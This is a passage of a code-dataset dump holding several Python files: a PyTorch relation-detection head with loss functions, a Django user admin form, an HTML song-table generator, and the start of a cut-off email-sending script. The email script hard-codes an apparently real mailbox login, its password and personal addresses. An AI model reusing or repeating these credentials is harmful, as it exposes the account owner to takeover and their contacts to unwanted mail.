1024)\n so_sem_embeddings.t_()\n\n '''\n subject visual embeddings\n '''\n\n\n # this is the visual subject embeddings\n sbj_vis_embeddings = F.normalize(sbj_vis_embeddings, p=2, dim=1) # (#bs, 1024)\n sbj_sim_matrix = torch.mm(sbj_vis_embeddings, so_sem_embeddings) # (#bs, #prd)\n\n sbj_cls_scores = cfg.MODEL.NORM_SCALE * sbj_sim_matrix\n\n # this is the visual object embeddings\n obj_vis_embeddings = F.normalize(obj_vis_embeddings, p=2, dim=1) # (#bs, 1024)\n obj_sim_matrix = torch.mm(obj_vis_embeddings, so_sem_embeddings) # (#bs, #prd)\n obj_cls_scores = cfg.MODEL.NORM_SCALE * obj_sim_matrix\n\n '''\n start to predict the predicate features\n\n '''\n\n '''\n add self afftention here for subject vis, object vis, prd hidden, subject label, object label\n\n '''\n \n\n \n prd_features = torch.cat((sbj_vis_embeddings.detach(), prd_hidden, obj_vis_embeddings.detach()), dim=1)\n\n prd_vis_embeddings = self.prd_vis_embeddings(prd_features)\n\n ds_prd_vecs = self.prd_vecs\n ds_prd_vecs = Variable(torch.from_numpy(ds_prd_vecs.astype('float32'))).cuda(device_id)\n prd_sem_embeddings = self.prd_sem_embeddings(ds_prd_vecs)\n prd_sem_embeddings = F.normalize(prd_sem_embeddings, p=2, dim=1) # (#prd, 1024)\n prd_vis_embeddings = F.normalize(prd_vis_embeddings, p=2, dim=1) # (#bs, 1024)\n prd_sim_matrix = torch.mm(prd_vis_embeddings, prd_sem_embeddings.t_()) # (#bs, #prd)\n prd_cls_scores = cfg.MODEL.NORM_SCALE * prd_sim_matrix\n\n if cfg.MODEL.USE_FREQ_BIAS:\n assert sbj_labels is not None and obj_labels is not None\n prd_cls_scores = prd_cls_scores + self.freq_bias.rel_index_with_labels(\n torch.stack((sbj_labels, obj_labels), 1))\n\n if not self.training:\n sbj_cls_scores = F.softmax(sbj_cls_scores, dim=1)\n obj_cls_scores = F.softmax(obj_cls_scores, dim=1)\n prd_cls_scores = F.softmax(prd_cls_scores, dim=1)\n\n return prd_cls_scores, sbj_cls_scores, obj_cls_scores\n\n\ndef add_cls_loss(cls_scores, labels, weight=None):\n if cfg.MODEL.LOSS == 'cross_entropy':\n return F.cross_entropy(cls_scores, labels)\n elif cfg.MODEL.LOSS == 'weighted_cross_entropy':\n return F.cross_entropy(cls_scores, labels, weight=weight)\n elif cfg.MODEL.LOSS == 'focal':\n cls_scores_exp = cls_scores.unsqueeze(2)\n cls_scores_exp = cls_scores_exp.unsqueeze(3)\n labels_exp = labels.unsqueeze(1)\n labels_exp = labels_exp.unsqueeze(2)\n return focal_loss.focal_loss(cls_scores_exp, labels_exp, alpha=cfg.MODEL.ALPHA, gamma=cfg.MODEL.GAMMA,\n reduction='mean')\n elif cfg.MODEL.LOSS == 'weighted_focal':\n cls_scores_exp = cls_scores.unsqueeze(2)\n cls_scores_exp = cls_scores_exp.unsqueeze(3)\n labels_exp = labels.unsqueeze(1)\n labels_exp = labels_exp.unsqueeze(2)\n weight = weight.unsqueeze(0)\n weight = weight.unsqueeze(2)\n weight = weight.unsqueeze(3)\n return focal_loss.focal_loss(cls_scores_exp, labels_exp, alpha=cfg.MODEL.ALPHA, gamma=cfg.MODEL.GAMMA,\n reduction='mean', weight_ce=weight)\n else:\n raise NotImplementedError\n\n\ndef add_hubness_loss(cls_scores):\n # xp_yall_prob (batch_size, num_classes)\n # xp_yall_prob.T (num_classes, batch_size\n # xp_yall_prob.expand(0, 1, -1, 1)\n # xp_yall_probT_average_reshape = xp_yall_probT_reshaped.mean(axis=2)\n # hubness_dist = xp_yall_probT_average_reshape - hubness_blob\n # hubness_dist_sqr = hubness_dist.pow(2)\n # hubness_dist_sqr_scaled = hubness_dist_sqr * cfg.TRAIN.HUBNESS_SCALE\n cls_scores = F.softmax(cls_scores, dim=1)\n hubness_blob = 1. / cls_scores.size(1)\n cls_scores_T = cls_scores.transpose(0, 1)\n cls_scores_T = cls_scores_T.unsqueeze(1).unsqueeze(3).expand(-1, 1, -1, 1)\n cls_scores_T = cls_scores_T.mean(dim=2, keepdim=True)\n hubness_dist = cls_scores_T - hubness_blob\n hubness_dist = hubness_dist.pow(2) * cfg.TRAIN.HUBNESS_SCALE\n hubness_loss = hubness_dist.mean()\n return hubness_loss\n\n\ndef reldn_losses(prd_cls_scores, prd_labels_int32, fg_only=False, weight=None):\n device_id = prd_cls_scores.get_device()\n prd_labels = Variable(torch.from_numpy(prd_labels_int32.astype('int64'))).cuda(device_id)\n if cfg.MODEL.LOSS == 'weighted_cross_entropy' or cfg.MODEL.LOSS == 'weighted_focal':\n weight = Variable(torch.from_numpy(weight)).cuda(device_id)\n loss_cls_prd = add_cls_loss(prd_cls_scores, prd_labels, weight=weight)\n # class accuracy\n prd_cls_preds = prd_cls_scores.max(dim=1)[1].type_as(prd_labels)\n accuracy_cls_prd = prd_cls_preds.eq(prd_labels).float().mean(dim=0)\n\n return loss_cls_prd, accuracy_cls_prd\n\n\ndef reldn_so_losses(sbj_cls_scores, obj_cls_scores, sbj_labels_int32, obj_labels_int32):\n device_id = sbj_cls_scores.get_device()\n\n sbj_labels = Variable(torch.from_numpy(sbj_labels_int32.astype('int64'))).cuda(device_id)\n loss_cls_sbj = add_cls_loss(sbj_cls_scores, sbj_labels)\n sbj_cls_preds = sbj_cls_scores.max(dim=1)[1].type_as(sbj_labels)\n accuracy_cls_sbj = sbj_cls_preds.eq(sbj_labels).float().mean(dim=0)\n\n obj_labels = Variable(torch.from_numpy(obj_labels_int32.astype('int64'))).cuda(device_id)\n loss_cls_obj = add_cls_loss(obj_cls_scores, obj_labels)\n obj_cls_preds = obj_cls_scores.max(dim=1)[1].type_as(obj_labels)\n accuracy_cls_obj = obj_cls_preds.eq(obj_labels).float().mean(dim=0)\n\n return loss_cls_sbj, loss_cls_obj, accuracy_cls_sbj, accuracy_cls_obj\n\n", "repo_name": "Vision-CAIR/RelTransformer", "sub_path": "lib/modeling/reldn_heads_reltransformer.py", "file_name": "reldn_heads_reltransformer.py", "file_ext": "py", "file_size_in_byte": 23380, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 27, "dataset": "github-code", "pt": "31", "api": [{"api_name": "logging.getLogger", "line_number": 26, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 30, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 30, "usage_type": "name"}, {"api_name": "transformer.Conv1D_", "line_number": 35, "usage_type": "call"}, {"api_name": "transformer.Conv1D_", "line_number": 36, "usage_type": "call"}, {"api_name": "torch.nn.Parameter", "line_number": 41, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 41, "usage_type": "name"}, {"api_name": "torch.FloatTensor", "line_number": 41, "usage_type": "call"}, {"api_name": "transformer.Conv1D_", "line_number": 42, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 43, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 43, "usage_type": "name"}, {"api_name": "torch.nn.Dropout", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 46, "usage_type": "name"}, {"api_name": "torch.matmul", "line_number": 49, "usage_type": "call"}, {"api_name": "torch.nn.Softmax", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 51, "usage_type": "name"}, {"api_name": "torch.matmul", "line_number": 54, "usage_type": "call"}, {"api_name": "torch.sigmoid", "line_number": 98, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 98, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 107, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 107, "usage_type": "name"}, {"api_name": "transformer.Conv1D_", "line_number": 112, "usage_type": "call"}, {"api_name": "transformer.Conv1D_", "line_number": 113, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 115, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 115, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 116, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 116, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 117, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 117, "usage_type": "name"}, {"api_name": "torch.nn.Dropout", "line_number": 119, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 119, "usage_type": "name"}, {"api_name": "torch.nn.init.xavier_uniform_", "line_number": 124, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 124, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 124, "usage_type": "name"}, {"api_name": "torch.nn.init.xavier_uniform_", "line_number": 125, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 125, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 125, "usage_type": "name"}, {"api_name": "torch.nn.init.xavier_uniform_", "line_number": 126, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 126, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 126, "usage_type": "name"}, {"api_name": "torch.nn.init.constant_", "line_number": 128, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 128, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 128, "usage_type": "name"}, {"api_name": "torch.nn.init.constant_", "line_number": 129, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 129, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 129, "usage_type": "name"}, {"api_name": "torch.nn.init.constant_", "line_number": 130, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 130, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 130, "usage_type": "name"}, {"api_name": "torch.matmul", "line_number": 137, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 139, "usage_type": "call"}, {"api_name": "torch.nn.Softmax", "line_number": 148, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 148, "usage_type": "name"}, {"api_name": "torch.matmul", "line_number": 150, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 189, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 189, "usage_type": "name"}, {"api_name": "transformer.Conv1D_", "line_number": 193, "usage_type": "call"}, {"api_name": "transformer.Conv1D_", "line_number": 194, "usage_type": "call"}, {"api_name": "transformer.gelu", "line_number": 195, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 203, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 203, "usage_type": "name"}, {"api_name": "transformer.LayerNorm", "line_number": 210, "usage_type": "call"}, {"api_name": "transformer.LayerNorm", "line_number": 212, "usage_type": "call"}, {"api_name": "torch.nn.Dropout", "line_number": 214, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 214, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 218, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 218, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 219, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 219, "usage_type": "name"}, {"api_name": "torch.sigmoid", "line_number": 241, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 241, "usage_type": "call"}, {"api_name": "torch.sigmoid", "line_number": 242, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 242, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 249, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 259, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 259, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 267, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 267, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 268, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 268, "usage_type": "name"}, {"api_name": "torch.nn.Embedding", "line_number": 270, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 270, "usage_type": "name"}, {"api_name": "torch.nn.Embedding", "line_number": 271, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 271, "usage_type": "name"}, {"api_name": "torch.nn.ModuleList", "line_number": 273, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 273, "usage_type": "name"}, {"api_name": "copy.deepcopy", "line_number": 273, "usage_type": "call"}, {"api_name": "torch.nn.Dropout", "line_number": 275, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 275, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 277, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 277, "usage_type": "name"}, {"api_name": "torch.nn.LayerNorm", "line_number": 278, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 278, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 295, "usage_type": "call"}, {"api_name": "torch.arange", "line_number": 303, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 303, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 308, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 308, "usage_type": "attribute"}, {"api_name": "torch.cat", "line_number": 331, "usage_type": "call"}, {"api_name": "torch.arange", "line_number": 338, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 338, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 343, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 343, "usage_type": "attribute"}, {"api_name": "torch.nn.Module", "line_number": 394, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 394, "usage_type": "name"}, {"api_name": "core.config.cfg.MODEL", "line_number": 398, "usage_type": "attribute"}, {"api_name": "core.config.cfg", "line_number": 398, "usage_type": "name"}, {"api_name": "core.config.cfg.MODEL", "line_number": 400, "usage_type": "attribute"}, {"api_name": "core.config.cfg", "line_number": 400, "usage_type": "name"}, {"api_name": "modeling.sparse_targets_rel.FrequencyBias", "line_number": 402, "usage_type": "call"}, {"api_name": "core.config.cfg.TEST", "line_number": 402, "usage_type": "attribute"}, {"api_name": "core.config.cfg", "line_number": 402, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 410, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 410, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 411, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 411, "usage_type": "name"}, {"api_name": "torch.nn.LeakyReLU", "line_number": 412, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 412, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 413, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 413, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 414, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 414, "usage_type": "name"}, {"api_name": "torch.nn.LeakyReLU", "line_number": 415, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 415, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 416, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 416, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 429, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 429, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 430, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 430, "usage_type": "name"}, {"api_name": "core.config.cfg.MODEL", "line_number": 430, "usage_type": "attribute"}, {"api_name": "core.config.cfg", "line_number": 430, "usage_type": "name"}, {"api_name": "torch.nn.LeakyReLU", "line_number": 431, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 431, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 432, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 432, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 434, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 434, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 435, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 435, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 436, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 436, "usage_type": "name"}, {"api_name": "core.config.cfg.MODEL", "line_number": 436, "usage_type": "attribute"}, {"api_name": "core.config.cfg", "line_number": 436, "usage_type": "name"}, {"api_name": "torch.nn.LeakyReLU", "line_number": 437, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 437, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 438, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 438, "usage_type": "name"}, {"api_name": "core.config.cfg.MODEL", "line_number": 440, "usage_type": "attribute"}, {"api_name": "core.config.cfg", "line_number": 440, "usage_type": "name"}, {"api_name": "core.config.cfg.TRAIN", "line_number": 442, "usage_type": "attribute"}, {"api_name": "core.config.cfg", "line_number": 442, "usage_type": "name"}, {"api_name": "modeling.sparse_targets_rel.FrequencyBias", "line_number": 443, "usage_type": "call"}, {"api_name": "core.config.cfg.TRAIN", "line_number": 443, "usage_type": "attribute"}, {"api_name": "core.config.cfg", "line_number": 443, "usage_type": "name"}, {"api_name": "modeling.sparse_targets_rel.FrequencyBias", "line_number": 445, "usage_type": "call"}, {"api_name": "core.config.cfg.TEST", "line_number": 445, "usage_type": "attribute"}, {"api_name": "core.config.cfg", "line_number": 445, "usage_type": "name"}, {"api_name": "core.config.cfg.MODEL", "line_number": 447, "usage_type": "attribute"}, {"api_name": "core.config.cfg", "line_number": 447, "usage_type": "name"}, {"api_name": "image_encoder.MemoryAugmentedEncoder", "line_number": 449, "usage_type": "call"}, {"api_name": "attention.ScaledDotProductAttentionMemory", "line_number": 449, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 456, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 456, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 456, "usage_type": "attribute"}, {"api_name": "nn.init.XavierFill", "line_number": 457, "usage_type": "call"}, {"api_name": "nn.init", "line_number": 457, "usage_type": "attribute"}, {"api_name": "torch.nn.init.constant_", "line_number": 459, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 459, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 459, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 460, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 460, "usage_type": "name"}, {"api_name": "torch.nn.init.constant_", "line_number": 461, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 461, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 461, "usage_type": "name"}, {"api_name": "torch.nn.init.constant_", "line_number": 462, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 462, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 462, "usage_type": "name"}, {"api_name": "torch.nn.init.xavier_uniform_", "line_number": 466, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 466, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 466, "usage_type": "name"}, {"api_name": "torch.nn.init.xavier_uniform_", "line_number": 470, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 470, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 470, "usage_type": "name"}, {"api_name": "torch.autograd.Variable", "line_number": 479, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 479, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 481, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 481, "usage_type": "call"}, {"api_name": "core.config.cfg.MODEL", "line_number": 485, "usage_type": "attribute"}, {"api_name": "core.config.cfg", "line_number": 485, "usage_type": "name"}, {"api_name": "torch.stack", "line_number": 487, "usage_type": "call"}, {"api_name": "torch.nn.functional.softmax", "line_number": 488, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 488, "usage_type": "name"}, {"api_name": "torch.autograd.Variable", "line_number": 528, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 528, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 531, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 531, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 546, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 546, "usage_type": "call"}, {"api_name": "torch.nn.functional.normalize", "line_number": 549, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 549, "usage_type": "name"}, {"api_name": "torch.nn.functional.normalize", "line_number": 558, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 558, "usage_type": "name"}, {"api_name": "torch.mm", "line_number": 559, "usage_type": "call"}, {"api_name": "core.config.cfg.MODEL", "line_number": 561, "usage_type": "attribute"}, {"api_name": "core.config.cfg", "line_number": 561, "usage_type": "name"}, {"api_name": "torch.nn.functional.normalize", "line_number": 564, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 564, "usage_type": "name"}, {"api_name": "torch.mm", "line_number": 565, "usage_type": "call"}, {"api_name": "core.config.cfg.MODEL", "line_number": 566, "usage_type": "attribute"}, {"api_name": "core.config.cfg", "line_number": 566, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 580, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 585, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 585, "usage_type": "call"}, {"api_name": "torch.nn.functional.normalize", "line_number": 587, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 587, "usage_type": "name"}, {"api_name": "torch.nn.functional.normalize", "line_number": 588, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 588, "usage_type": "name"}, {"api_name": "torch.mm", "line_number": 589, "usage_type": "call"}, {"api_name": "core.config.cfg.MODEL", "line_number": 590, "usage_type": "attribute"}, {"api_name": "core.config.cfg", "line_number": 590, "usage_type": "name"}, {"api_name": "core.config.cfg.MODEL", "line_number": 592, "usage_type": "attribute"}, {"api_name": "core.config.cfg", "line_number": 592, "usage_type": "name"}, {"api_name": "torch.stack", "line_number": 595, "usage_type": "call"}, {"api_name": "torch.nn.functional.softmax", "line_number": 598, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 598, "usage_type": "name"}, {"api_name": "torch.nn.functional.softmax", "line_number": 599, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 599, "usage_type": "name"}, {"api_name": "torch.nn.functional.softmax", "line_number": 600, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 600, "usage_type": "name"}, {"api_name": "core.config.cfg.MODEL", "line_number": 606, "usage_type": "attribute"}, {"api_name": "core.config.cfg", "line_number": 606, "usage_type": "name"}, {"api_name": "torch.nn.functional.cross_entropy", "line_number": 607, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 607, "usage_type": "name"}, {"api_name": "core.config.cfg.MODEL", "line_number": 608, "usage_type": "attribute"}, {"api_name": "core.config.cfg", "line_number": 608, "usage_type": "name"}, {"api_name": "torch.nn.functional.cross_entropy", "line_number": 609, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 609, "usage_type": "name"}, {"api_name": "core.config.cfg.MODEL", "line_number": 610, "usage_type": "attribute"}, {"api_name": "core.config.cfg", "line_number": 610, "usage_type": "name"}, {"api_name": "utils.focal_loss.focal_loss", "line_number": 615, "usage_type": "call"}, {"api_name": "utils.focal_loss", "line_number": 615, "usage_type": "name"}, {"api_name": "core.config.cfg.MODEL", "line_number": 615, "usage_type": "attribute"}, {"api_name": "core.config.cfg", "line_number": 615, "usage_type": "name"}, {"api_name": "core.config.cfg.MODEL", "line_number": 617, "usage_type": "attribute"}, {"api_name": "core.config.cfg", "line_number": 617, "usage_type": "name"}, {"api_name": "utils.focal_loss.focal_loss", "line_number": 625, "usage_type": "call"}, {"api_name": "utils.focal_loss", "line_number": 625, "usage_type": "name"}, {"api_name": "core.config.cfg.MODEL", "line_number": 625, "usage_type": "attribute"}, {"api_name": "core.config.cfg", "line_number": 625, "usage_type": "name"}, {"api_name": "torch.nn.functional.softmax", "line_number": 639, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 639, "usage_type": "name"}, {"api_name": "core.config.cfg.TRAIN", "line_number": 645, "usage_type": "attribute"}, {"api_name": "core.config.cfg", "line_number": 645, "usage_type": "name"}, {"api_name": "torch.autograd.Variable", "line_number": 652, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 652, "usage_type": "call"}, {"api_name": "core.config.cfg.MODEL", "line_number": 653, "usage_type": "attribute"}, {"api_name": "core.config.cfg", "line_number": 653, "usage_type": "name"}, {"api_name": "torch.autograd.Variable", "line_number": 654, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 654, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 666, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 666, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 671, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 671, "usage_type": "call"}]}
+{"seq_id": "14542331662", "text": "from django.contrib import admin\nfrom django.contrib.auth.forms import UserCreationForm\n\nfrom user.models import User\n\nbase_list_display = ('id', 'first_name', 'last_name', 'email')\nextended_list = base_list_display + ('username', 'role')\n\n\nclass CustomUserCreationForm(UserCreationForm):\n \"\"\"\n User creation form.\n \"\"\"\n\n class Meta:\n model = User\n fields = [item for item in extended_list if item != 'id']\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n for field in extended_list:\n if field != 'id':\n self.fields[field].required = True\n\n\n@admin.register(User)\nclass UserAdmin(admin.ModelAdmin):\n list_display = extended_list\n form = CustomUserCreationForm\n", "repo_name": "hahaSK/IIS_Cinema", "sub_path": "user/admin.py", "file_name": "admin.py", "file_ext": "py", "file_size_in_byte": 760, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "django.contrib.auth.forms.UserCreationForm", "line_number": 10, "usage_type": "name"}, {"api_name": "user.models.User", "line_number": 16, "usage_type": "name"}, {"api_name": "django.contrib.admin.ModelAdmin", "line_number": 27, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 27, "usage_type": "name"}, {"api_name": "django.contrib.admin.register", "line_number": 26, "usage_type": "call"}, {"api_name": "user.models.User", "line_number": 26, "usage_type": "argument"}, {"api_name": "django.contrib.admin", "line_number": 26, "usage_type": "name"}]}
+{"seq_id": "36530676891", "text": "# read music from music.json\n\nimport json\n\ndef big2Small(song):\n return {\"title\": song['song']['title'],\n \"artist\": song['artist']['name'] }\n\ndef songListToHTMLTable(songs):\n answer = \"\\n\" + songTableHeader()\n for song in songs:\n answer += song2HTMLTableRow(song)\n answer += \"
\\n\"\n return answer\n\ndef songTableHeader():\n return (\"\\n\" +\n \" Song Title \" +\n \" Artist Name \" + \n \" \\n\")\n\n\ndef song2HTMLTableRow(song):\n return (\"\\n\" +\n \"\" + song['song']['title'] + \" \" +\n \"\" + song['artist']['name'] + \" \" + \n \" \\n\")\n\n\ndef writeWebPage(filename,content,title):\n with open(filename,'w') as webpage:\n webpage.write(\"\\n\")\n webpage.write(\"\\n\")\n \n webpage.write(\"\\n\")\n styleElem = \"\"\"\n \n \n \"\"\"\n webpage.write(styleElem)\n \n webpage.write(\"\" + title + \" \\n\")\n webpage.write(\"\\n\")\n\n webpage.write(\"\\n\")\n webpage.write(content)\n webpage.write(\"\\n\")\n\n webpage.write(\"\\n\")\n \n\nif __name__==\"__main__\":\n with open('music.json') as json_data:\n songs = json.load(json_data)\n\n print(\"The variable songs now contains all the data\")\n\n print(\"The variable songs is a list of big complicated dictionaries\")\n print(\"We'd like a list of something easier to work with\")\n\n print(\"The function big2Small(song) will turn a big song dictionary\")\n print(\"into a smaller one\")\n \n writeWebPage(\"fiveSongs.html\",songListToHTMLTable(songs[5:10]),\"five songs\")\n \n", "repo_name": "ucsb-cs8-s18/LECTURE_05_08", "sub_path": "generateMusicWebPage.py", "file_name": "generateMusicWebPage.py", "file_ext": "py", "file_size_in_byte": 1830, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "json.load", "line_number": 62, "usage_type": "call"}]}
+{"seq_id": "30633158552", "text": "#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\nfrom email import encoders\nfrom email.header import Header\nfrom email.mime.text import MIMEText\nfrom email.mime.multipart import MIMEMultipart, MIMEBase\nfrom email.mime.application import MIMEApplication\nfrom email.utils import parseaddr, formataddr\n\nimport smtplib\n\ndef _format_addr(s):\n name, addr = parseaddr(s)\n return formataddr((Header(name, 'utf-8').encode(), addr))\n\nfrom_addr = 'lhr_nicelife@163.com' # input('From: ')\npassword = 'Love20160120' #input('Password: ')\nto_addr = '152668252@qq.com, 376939627@qq.com' #input('To: ')\ncc_addr = 'linhanrui2006@163.com, henry.lin@ubtrobot.com'\nsmtp_server = 'smtp.163.com' #input('SMTP server: ')\n\n\n# 邮件对象:\nmsg = MIMEMultipart()\n\nmsg['From'] = _format_addr('163邮箱木木 <%s>' % from_addr)\nmsg['To'] = to_addr #_format_addr('卓灼上神 <%s>' % to_addr)\nmsg['Subject'] = Header('测试Python的邮件', 'utf-8').encode()\n\n# 邮件正文是MIMEText:\n# msg.attach(MIMEText('send with file...', 'plain', 'utf-8'))\nmsg.attach(MIMEText('Hello ' +\n # '
